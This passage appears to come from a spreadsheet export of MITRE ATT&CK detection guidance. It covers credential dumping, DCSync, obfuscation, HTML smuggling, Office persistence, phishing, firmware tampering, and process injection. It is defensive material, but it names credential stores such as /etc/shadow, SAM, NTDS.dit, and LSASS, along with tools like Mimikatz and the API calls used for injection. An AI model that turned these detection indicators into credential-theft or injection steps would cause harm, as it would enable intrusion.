To obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path &lt;code&gt;/proc/&lt;pid&gt;/maps&lt;/code&gt;, where the &lt;code&gt;&lt;pid&gt;&lt;/code&gt; directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.</t>
  </si>
  <si>
    <t>The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes attempting to access &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt;, alerting on the pid, process name, and arguments of such programs.</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.</t>
  </si>
  <si>
    <t>Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)
Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.</t>
  </si>
  <si>
    <t>Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.
Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the NTDS.dit.</t>
  </si>
  <si>
    <t>To obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path &lt;code&gt;/proc/\*/maps&lt;/code&gt;, where the &lt;code&gt;\*&lt;/code&gt; directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.</t>
  </si>
  <si>
    <t>Hash dumpers open the Security Accounts Manager (SAM) on the local file system (&lt;code&gt;%SystemRoot%/system32/config/SAM&lt;/code&gt;) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.</t>
  </si>
  <si>
    <t xml:space="preserve">Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system). 
Flag and analyze commands containing indicators of obfuscation and known suspicious syntax such as uninterpreted escape characters like '''^''' and '''"'''. Windows' Sysmon and Event ID 4688 displays command-line arguments for processes. Deobfuscation tools can be used to detect these indicators in files/payloads. (Citation: GitHub Revoke-Obfuscation) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: GitHub Office-Crackros Aug 2016) 
Obfuscation used in payloads for Initial Access can be detected at the network. Use network intrusion detection systems and email gateway filtering to identify compressed and encrypted attachments and scripts. Some email attachment detonation systems can open compressed and encrypted attachments. Payloads delivered over an encrypted connection from a website require encrypted network traffic inspection. 
The first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network. </t>
  </si>
  <si>
    <t xml:space="preserve">Depending on the method used to pad files, a file-based signature may be capable of detecting padding using a scanning or on-access based tool.  When executed, the resulting process from padded files may also exhibit other behavior characteristics of being used to conduct an intrusion such as system and network information Discovery or Lateral Movement, which could be used as event indicators that point to the source file. </t>
  </si>
  <si>
    <t>Monitor the execution file paths and command-line arguments for common compilers, such as csc.exe and GCC/MinGW, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior. The compilation of payloads may also generate file creation and/or file write events. Look for non-native binary formats and cross-platform compiler and execution frameworks like Mono and determine if they have a legitimate purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these should only be used in specific and limited cases, like for software development.</t>
  </si>
  <si>
    <t>Detection of HTML Smuggling is difficult as HTML5 and JavaScript attributes are used by legitimate services and applications. HTML Smuggling can be performed in many ways via JavaScript, developing rules for the different variants, with a combination of different encoding and/or encryption schemes, may be very challenging.(Citation: Outlflank HTML Smuggling 2018) Detecting specific JavaScript and/or HTML5 attribute strings such as &lt;code&gt;Blob&lt;/code&gt;, &lt;code&gt;msSaveOrOpenBlob&lt;/code&gt;, and/or &lt;code&gt;download&lt;/code&gt; may be a good indicator of HTML Smuggling. These strings may also be used by legitimate services therefore it is possible to raise false positives.
Consider monitoring files downloaded from the Internet, possibly by HTML Smuggling, for suspicious activities. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.</t>
  </si>
  <si>
    <t>The first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network.</t>
  </si>
  <si>
    <t>Use file scanning to look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because legitimate software may use packing techniques to reduce binary size or to protect proprietary code.</t>
  </si>
  <si>
    <t>Detection of steganography is difficult unless artifacts are left behind by the obfuscation process that are detectable with a known signature. Look for strings or other signatures left in system artifacts related to decoding steganography.</t>
  </si>
  <si>
    <t>Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.</t>
  </si>
  <si>
    <t>Consider analyzing code signing certificates for features that may be associated with the adversary and/or their developers, such as the thumbprint, algorithm used, validity period, common name, and certificate authority. Malware repositories can also be used to identify additional samples associated with the adversary and identify patterns an adversary has used in procuring code signing certificates.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).</t>
  </si>
  <si>
    <t>Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).</t>
  </si>
  <si>
    <t xml:space="preserve">
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).</t>
  </si>
  <si>
    <t>Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific MaaS offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.</t>
  </si>
  <si>
    <t>In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the potential use of exploits for vulnerabilities (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).</t>
  </si>
  <si>
    <t>Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)</t>
  </si>
  <si>
    <t>Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior</t>
  </si>
  <si>
    <t>Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page) Modification to base templates, like Normal.dotm, should also be investigated since the base templates should likely not contain VBA macros. Changes to the Office macro security settings should also be investigated.(Citation: GlobalDotName Jun 2019)</t>
  </si>
  <si>
    <t>Monitor for the creation of the Office Test Registry key. Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence. Since v13.52, Autoruns can detect tasks set up using the Office Test Registry key.(Citation: Palo Alto Office Test Sofacy)
Consider monitoring Office processes for anomalous DLL loads.</t>
  </si>
  <si>
    <t>Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.</t>
  </si>
  <si>
    <t>Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.</t>
  </si>
  <si>
    <t>Monitor logs and processes for tools and command line arguments that may indicate they're being used for password policy discovery. Correlate that activity with other suspicious activity from the originating system to reduce potential false positives from valid user or administrator activity. Adversaries will likely attempt to find the password policy early in an operation and the activity is likely to happen with other Discovery activity.</t>
  </si>
  <si>
    <t>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
Monitor processes and command-line arguments for actions that could be taken to gather system and network information.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 Monitor container logs for commands and/or API calls related to listing permissions for pods and nodes, such as &lt;code&gt;kubectl auth can-i&lt;/code&gt;.(Citation: K8s Authorization Overview)</t>
  </si>
  <si>
    <t>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
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Activity and account logs for the cloud services can also be monitored for suspicious commands that are anomalous compared to a baseline of normal activity.</t>
  </si>
  <si>
    <t>Network intrusion detection systems and email gateways can be used to detect phishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.
Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.
Because most common third-party services used for phishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware.
Anti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Many possible detections of follow-on behavior may take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.</t>
  </si>
  <si>
    <t>Depending on the specific method of phishing, the detections can vary. Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
When it comes to following links, monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites.
Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).</t>
  </si>
  <si>
    <t>Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)</t>
  </si>
  <si>
    <t>Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
Monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites.</t>
  </si>
  <si>
    <t>Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).
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Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.
Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
Anti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.
Monitor for suspicious descendant process spawning from Microsoft Office and other productivity software.(Citation: Elastic - Koadiac Detection with EQL)</t>
  </si>
  <si>
    <t>URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites as well as links redirecting to adversary infrastructure based by upon suspicious OAuth patterns with unusual TLDs.(Citation: Microsoft OAuth 2.0 Consent Phishing 2021). Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.
Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
Because this technique usually involves user interaction on the endpoint, many of the possible detections take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.</t>
  </si>
  <si>
    <t>Because most common third-party services used for spearphishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware. 
Anti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for common command-line editors used to modify plist files located in auto-run locations, such as &lt;code&gt;\~/LaunchAgents&lt;/code&gt;, &lt;code&gt;~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm&lt;/code&gt;, and an application's &lt;code&gt;Info.plist&lt;/code&gt;. 
Monitor for plist file modification immediately followed by code execution from &lt;code&gt;\~/Library/Scripts&lt;/code&gt; and &lt;code&gt;~/Library/Preferences&lt;/code&gt;. Also, monitor for significant changes to any path pointers in a modified plist.
Identify new services executed from plist modified in the previous user's session. </t>
  </si>
  <si>
    <t>Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching.
Disk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation.(Citation: ITWorld Hard Disk Health Dec 2014)</t>
  </si>
  <si>
    <t>Perform integrity checking on MBR and VBR. Take snapshots of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis.</t>
  </si>
  <si>
    <t>Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) disk monitoring may reveal malicious manipulations of components.(Citation: SanDisk SMART)(Citation: SmartMontools) Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.
Disk check and forensic utilities may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation.(Citation: ITWorld Hard Disk Health Dec 2014) Also consider comparing components, including hashes of component firmware and behavior, against known good images.</t>
  </si>
  <si>
    <t>There are no documented means for defenders to validate the operation of the ROMMON outside of vendor support. If a network device is suspected of being compromised, contact the vendor to assist in further investigation.</t>
  </si>
  <si>
    <t>System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior.
Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)</t>
  </si>
  <si>
    <t>Consider comparing a copy of the network device configuration and system image against a known-good version to discover unauthorized changes to system boot, startup configuration, or the running OS. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot) (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor.  (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)
Review command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration. (Citation: Cisco IOS Software Integrity Assurance - Command History) Check boot information including system uptime, image booted, and startup configuration to determine if results are consistent with expected behavior in the environment. (Citation: Cisco IOS Software Integrity Assurance - Boot Information) Monitor unusual connections or connection attempts to the device that may specifically target TFTP or other file-sharing protocols.</t>
  </si>
  <si>
    <t>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
Normal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information.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t>
  </si>
  <si>
    <t xml:space="preserve">Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as &lt;code&gt;CreateRemoteThread&lt;/code&gt;, &lt;code&gt;SuspendThread&lt;/code&gt;/&lt;code&gt;SetThreadContext&lt;/code&gt;/&lt;code&gt;ResumeThread&lt;/code&gt;, &lt;code&gt;QueueUserAPC&lt;/code&gt;/&lt;code&gt;NtQueueApcThread&lt;/code&gt;, and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be used for this technique.(Citation: Elastic Process Injection July 2017) 
Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. 
Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics)  (Citation: GNU Acct)  (Citation: RHEL auditd)  (Citation: Chokepoint preload rootkits) 
Monitor for named pipe creation and connection events (Event IDs 17 and 18) for possible indicators of infected processes with external modules.(Citation: Microsoft Sysmon v6 May 2017) 
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t xml:space="preserve">Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as &lt;code&gt;SuspendThread&lt;/code&gt;/&lt;code&gt;SetThreadContext&lt;/code&gt;/&lt;code&gt;ResumeThread&lt;/code&gt;, &lt;code&gt;QueueUserAPC&lt;/code&gt;/&lt;code&gt;NtQueueApcThread&lt;/code&gt;, and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be used for this technique.(Citation: Elastic Process Injection July 2017)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t xml:space="preserve">Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as &lt;code&gt;CreateRemoteThread&lt;/code&gt; and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be used for this technique.(Citation: Elastic Process Injection July 2017)
Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. 
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t>Monitor for API calls related to enumerating and manipulating EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated with this technique have also used SendNotifyMessage (Citation: Microsoft SendNotifyMessage function) to trigger the associated window procedure and eventual malicious injection. (Citation: Elastic Process Injection July 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as &lt;code&gt;FindWindow&lt;/code&gt;, &lt;code&gt;FindWindowEx&lt;/code&gt;, &lt;code&gt;EnumWindows&lt;/code&gt;, &lt;code&gt;EnumChildWindows&lt;/code&gt;, and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be abused for this technique. 
Consider monitoring for excessive use of &lt;code&gt;SendMessage&lt;/code&gt; and/or &lt;code&gt;PostMessage&lt;/code&gt; API functions with &lt;code&gt;LVM_SETITEMPOSITION&lt;/code&gt; and/or &lt;code&gt;LVM_GETITEMPOSITION&lt;/code&gt; arguments.
Analyze process behavior to determine if a process is performing unusual actions, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t xml:space="preserve">Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as &lt;code&gt;CreateRemoteThread&lt;/code&gt; and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be used for this technique.(Citation: Elastic Process Injection July 2017)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t xml:space="preserve">File system monitoring can determine if /proc files are being modified. Users should not have permission to modify these in most cases. 
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t>Monitor and analyze calls to &lt;code&gt;CreateTransaction&lt;/code&gt;, &lt;code&gt;CreateFileTransacted&lt;/code&gt;, &lt;code&gt;RollbackTransaction&lt;/code&gt;, and other rarely used functions indicative of TxF activity. Process Doppelgänging also invokes an outdated and undocumented implementation of the Windows process loader via calls to &lt;code&gt;NtCreateProcessEx&lt;/code&gt; and &lt;code&gt;NtCreateThreadEx&lt;/code&gt; as well as API calls used to modify memory within another process, such as &lt;code&gt;WriteProcessMemory&lt;/code&gt;. (Citation: BlackHat Process Doppelgänging Dec 2017) (Citation: hasherezade Process Doppelgänging Dec 2017)
Scan file objects reported during the PsSetCreateProcessNotifyRoutine, (Citation: Microsoft PsSetCreateProcessNotifyRoutine routine) which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. (Citation: BlackHat Process Doppelgänging Dec 2017) Also consider comparing file objects loaded in memory to the corresponding file on disk. (Citation: hasherezade Process Doppelgänging Dec 2017)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.</t>
  </si>
  <si>
